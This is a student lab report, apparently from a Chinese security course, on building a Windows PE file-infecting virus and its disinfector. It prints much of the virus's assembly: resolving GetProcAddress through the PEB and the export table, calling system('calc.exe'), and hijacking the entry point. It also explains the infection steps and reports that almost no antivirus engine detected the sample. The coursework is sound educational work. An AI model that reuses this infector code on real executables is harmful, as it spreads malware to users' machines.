PE file virus experiment (two)-experiment report

Experiment purpose: master the PE file format; understand the principle of virus infection of PE files.
Experiment content:
(1) Understand the PE file format.
(2) According to the experimental procedure, program to insert virus code in PE file. Run the PE file after inserting the virus code.
(3) Programming to realize the operation of searching for .exe files in the disk, inserting virus code for all .exe files and running the exe file after inserting the virus code.
(4) Program to realize the operation of searching the .exe file in (3) in the disk, delete the virus code for all the .exe files and run the exe file after deleting the virus code. .

project address

https://github.com/jmhIcoding/PE-learning.git

1. Experimental principle:

Win32 executable files, such as *.exe, .dll, .ocx, etc., are all files in PE format. The win32 virus that infects files in PE format is called PE virus for short. PE virus is also the most numerous, destructive, and most skillful virus among all viruses. In order to better develop anti-virus technology, it is extremely necessary to understand the principles of viruses. A PE virus basically needs to have several functions such as relocation, intercepting API function addresses, searching for infected target files, memory file mapping, and implementing infections. These are also several basic problems that the virus must solve.

The basic steps of PE virus infecting files are as follows:
(1) Determine whether the first two bytes of the target file are "MZ".
(2) Determine the PE file mark "PE".
(3) Determine the infection mark, if it has been infected, jump out and continue to execute the HOST program, otherwise continue.
(4) Get the number of Directory (data directory), (each data directory information occupies 8 bytes).
(5) Get the starting position of the section table. (The offset address of the Directory + the number of bytes occupied by the data directory = the starting position of the section table).
(6) Traverse all the section tables and find the first section with free space that can accommodate all virus codes.
The calculation method of the free space of each section: the free space of
the i-th section = the virtual address of the i+1th section-the virtual address of the i-th section-the Misc.VirtualSize of the i-th section
(7) Start writing Target code:

  1. Calculate the file offset position of the target code, and later the target code will be written into the PE file from this position. The calculation method is: Misc.VirtualSize of the target section table + PointerToRawData of the target section table
  2. The section attribute of the modified target section is 0xE00000E0, which means that the target section becomes readable, writable, and executable.
  3. Data segment written into the target code
  4. The executive body that writes the target code
  5. Modify the AddressOfEntryPoint (that is, the program entry point points to the virus entry location), and save the old AddressOfEntryPoint at the same time, so that it can return to HOST to continue execution.
  6. Update SizeOfImage (the size of the entire PE image in the memory = the original SizeOfImage + the size of the virus section after the memory section is aligned). The size of the SizeOfCode code is the size of the original SizeOfCode+virus code after memory alignment.
  7. Write the infection mark, and write the old AddressOfEntryPoint after the infection mark to help detoxify.

2. Laboratory equipment (equipment, components)

(1) Each student has a PC with Windows operating system installed.

3. Experimental steps:

PE file virus
1. Compile a simple program whose output is "hello world!", and run it to get the hello.exe file.
2. Compile a simple virus code, the virus can start the computer program of the system.
3. The preparation program inserts the virus code in the hello.exe file, and runs the hello.exe after the inserted code.
4. Run the detoxification code to solve the problem of the just infected hello.exe, so that the virus code cannot be executed.

4. Experimental data and result analysis:

1. Write the host program hello.exe:

int main()
{ printf("Hello world!..\n"); system("pause"); return 0; } Operation effect:





Insert picture description here

2. Write virus code

The basic idea of ​​the virus code is:

A. First dynamically obtain the base address of KernalBase32.dll through TEB
. B. Then search the process space of KernalBase32 to find the function address of the GetProcAddress() function.
The function prototype of the GetProcAddress() function is:

FARPROC GetProcAddress(
HMODULE hModule, // DLL模块句柄
LPCSTR lpProcName // 函数名
);

Through this function, you can get the function address of the specified function in a dll.
We will use this function to get the address of the LoadLibraryExa function and the system() function.
The function prototype of LoadLibraryExa is:

HMODULE WINAPI LoadLibraryEx(
  _In_       LPCTSTR lpFileName,//DLL文件的文件名,例如“msvcr120.dll”
  _Reserved_ HANDLE  hFile,//保留字,设置为0
  _In_       DWORD   dwFlags//标志位,设置为0x10,以最高权限加载dll
);

The LoadLibraryExa function is used to load a dll file. In this experiment, it is used to load msvcr120.dll, and system() exists in msvcr120.dll. We use a calling method similar to system("calc.exe") to pass system( ) Start the calculator program.
C. Considering that the virus code requires data to be used, a data segment will be added before the code.

The layout of the virus code is:

A total of 96 bytes in the data area
include:

旧的AddressOfEntryPoint,程序入口(4个字节)
Baseofmsvcr120;目标dll文件的基地址(4个字节)
AddOfFunction;目标函数(system)的函数地址(4字节),该函数将会被执行。
addOfcurrent;病毒代码的虚拟地址,用于重定位(4字节)
dllname;需要载入的目标dll的文件名,(16字节),也就是“msvcr120.dll”
functionname;目标dll里面需要执行的函数(16字节),也就是“system”
info;functionname函数的参数(16字节),也就是“calc.exe”
loadLibrarayEx; LoadLibraryExa的字符串(16字节)
pLoadLibraryExa;LoadLibraryExa函数的地址(4字节)
kernalBase; KernalBase的基地址(4字节)
getProcAddr; getProcAddress函数的基地址(4字节)
他们的定义为:
//病毒代码块
			//数据区
			DWORD oldEntry = fileh.OptionalHeader.AddressOfEntryPoint;//-92
			DWORD baseOfmsvcr120 = 0;//-88
			DWORD addOfprintf = 0;//-84
			DWORD addOfcurrent = 0;//-80
			char dllname[16] = "msvcr120.dll";//-76
			char functionname[16] = "system";//-60
			char info[16] = "calc.exe";//-44
			char loadlibraryEx[16] = "LoadLibraryExA";//-28
			DWORD pLoadLibraryExA = 0;//-12
			DWORD kernelBase = 0;//-8
			DWORD getProcAddr = 0;//-4

Design of code execution area:

First need to relocate, through

call A
				A :
				pop edi		
				//可能会有一定偏移
				sub edi,5
				mov [edi-80], edi;//assign current address.

Save the current memory address to edi. At this time, edi first offsets the lower address by 80 units, which is the memory unit where addOfcurrent is located in the data area. Note that edi needs to be subtracted by 5 bytes first, because the call and pop instructions occupy 5 bytes. After subtracting 5 bytes, edi is the end of the execution data area getProcAddr.

Then get the base address of KernalBase32:

mov eax, fs:[30h]
			mov eax, [eax + 0ch]
			mov eax, [eax + 1ch]
			mov eax, [eax]
				mov eax, [eax + 8h]
			mov [edi-8], eax;

This is mainly obtained through the structure of PEB and TEB. This method can correctly obtain the KernalBase32 base address in Windows 10, Windows 7 and XP.

Then search for the address of the GetProcAddress function.

				mov edi, eax
					mov eax, [edi + 3Ch]
					mov edx, [edi + eax + 78h]
					add edx, edi; edx = 引出表地址
					mov ecx, [edx + 18h]; ecx = 输出函数的个数
					mov ebx, [edx + 20h]
					add ebx, edi; ebx =函数名地址,AddressOfName

				search :
				dec ecx
					mov esi, [ebx + ecx * 4]
					add esi, edi; 依次找每个函数名称
					; GetProcAddress
					mov eax, 0x50746547
					cmp[esi], eax; 'PteG'
					jne search
					mov eax, 0x41636f72
					cmp[esi + 4], eax; 'Acor'
					jne search
					; 如果是GetProcA,表示找到了
					mov ebx, [edx + 24h]
					add ebx, edi; ebx = 序号数组地址, AddressOf
					mov cx, [ebx + ecx * 2]; ecx = 计算出的序号值
					mov ebx, [edx + 1Ch]
					add ebx, edi; ebx=函数地址的起始位置,AddressOfFunction
					mov eax, [ebx + ecx * 4]
					add eax, edi; 利用序号值,得到出GetProcAddress的地址
					sub eax, 0xb0
					pop edi
					mov ebx, edi;
					mov [ebx-4], eax;//GetProcAddress的地址

This is mainly through searching, the name "GetProcAddress" is obtained by searching, and then the address of GetProcAddress is obtained by Northbridge query according to the structure of the export table through this name, and it is saved in the getProcAdd in the data area.

Then get the address of LoadLibraryExa through GetProcAddree:

sub ebx,28
				push ebx
				add ebx,28
				push [ebx-8];
				call [ebx-4];
			mov [ebx-12], eax;//LoadLibrary的地址
再通过LoadLibraryExa载入msvcr120.dll这个动态链接库:
				push 0x00000010
					push 0x00000000
					
					sub ebx,76
					push ebx
					add ebx,76
					//push eax
				call [ebx-12]

					mov [ebx-88], eax;

Among them, ebx-76 is the address of the string "msvcr120.dll" in the data area. The handle of this library is preserved

Then get the address of system:

mov edx, eax
					sub ebx,60
					push ebx
					add ebx,60
					push edx
				call [ebx-4];//得到system的地址
mov [ebx-84], eax;

Call the system function:

sub ebx,44
					push ebx
					add ebx,44
				call eax

Restore the stack:

					add esp, 400h
					pop ecx
					pop esp
					pop ebp
					pop edx

					pop esi
					pop eax
				pop ebx;

Switch back to the original entry point:

					mov eax, fs:[30h]
					mov eax, DWORD PTR [eax+8]
					add eax, [edi-92]
					mov edi,eax
					pop eax
				jmp edi

Note that the original entry address needs to be dynamically calculated. The oldEntryAddress in the data area just saves the relative offset address of the old entry point. We need to add this relative offset address to the base address of the process itself to obtain the virtual address.

3. Write infection code

The infection code is mainly to check whether the target file is a PE file and whether it is infected. If it can be infected, insert the virus code into the target PE file.
This experiment uses the 8 bytes following DOS as the infection sign. If the 4 bytes behind DOS are 0x06060606, it means it has been infected, and the last 4 bytes are the old addresses for detoxification.
If it is not infected, then:
1. Obtain all section tables of the PE file
2. Search for the section table that has enough free space to accommodate the virus code
3. Write the virus code into the appropriate section of the PE file
4. Modify SizeOfImage, SizeOfCode, and Section attributes of the modified section
5. Add the infection flag, set the 4 bytes behind the DOS of the PE file to 0x06060606, and save the old program entry point behind 0x06060606.
6. Modify the program entry point of the PE file.

4. Write detoxification code

The process of detoxification is very simple, because we will save the real entry point of the host program behind the infection mark when infecting, so we only need to get the real entry point of the host program and modify the entry point of the host program back. The virus code will not be executed.

5. Running results

We set the host program as hello.exe in 1. Before infection, the operating effect of the program is:
Insert picture description here
we run the virus program to infect the host program:
virus program infection:

Insert picture description here
Run the infected host program: The
Insert picture description here
host program starts the calculator program before printing Hello world, indicating that the infection is successful.
We use IDA to check the host program, and we can also see that the virus code is successfully inserted into the host:
Insert picture description here
Insert picture description here
Then we run the detoxification program, yes The host program is detoxified: the
detoxification program is in detoxification:
Insert picture description here
run the host program again:
Insert picture description here
we can find that the host program is back to normal again, and the calculator program is not started. So the detoxification is successful!

5. Experimental conclusions, experience and suggestions for improvement:

In this experiment, by actually writing the virus code, infection module, and detoxification module of a PE program, we have a more thorough grasp of the format of the PE file. In this experiment, the virus code is inserted into the free space by searching for the section with free address space in the PE file. Then modify the corresponding fields, modify the attributes of the section, modify the entry point, and add the infection flag. The running structure of the infected program shows that the virus has successfully infected the host program, and obtained the control right before the host program runs. After starting a calculator program, the control right is returned to the host program. The experiment was quite successful.

In addition, I uploaded the virus program to the online virus scanning website to test whether the virus program can be recognized by the antivirus software. The results of the check are as follows:
Insert picture description here
39 well-known antivirus software were tested, and only one antivirus software accurately identified the virus program. Virus program.
Insert picture description here
Kaspersky, Symantec, Rising, and Qihoo 360 have not been accurately identified. This shows the limitations of traditional anti-virus software in the face of new viruses that have not broken out, although this is still an ordinary PE virus.

6. Suggestions for improvement of the experimental process, methods and methods:

The suggestion in the experiment guide is to add a new section directly to the PE file to insert the virus code. In fact, the workload is particularly complicated. Because after inserting a new section, the section table either needs to insert a new section table entry, which requires offsetting all the sections after the section table entry. This process is very error-prone; or simply put the last section table ( Generally it is a free section table) to modify, so that there is no need to offset the section, but not all PE files will reserve a blank section table entry.

Therefore, this experiment uses the method of inserting the virus code into the gap of the section. In this way, there is no need to offset the section, and there is no need to care about the alignment of the modified PE file.

In addition, the virus code can be directly attached to the end of the last section and merged with the content of the original last section to form a large section. This does not need to add new section table entries, and there is no section offset problem.

Guess you like

Origin blog.csdn.net/jmh1996/article/details/104592450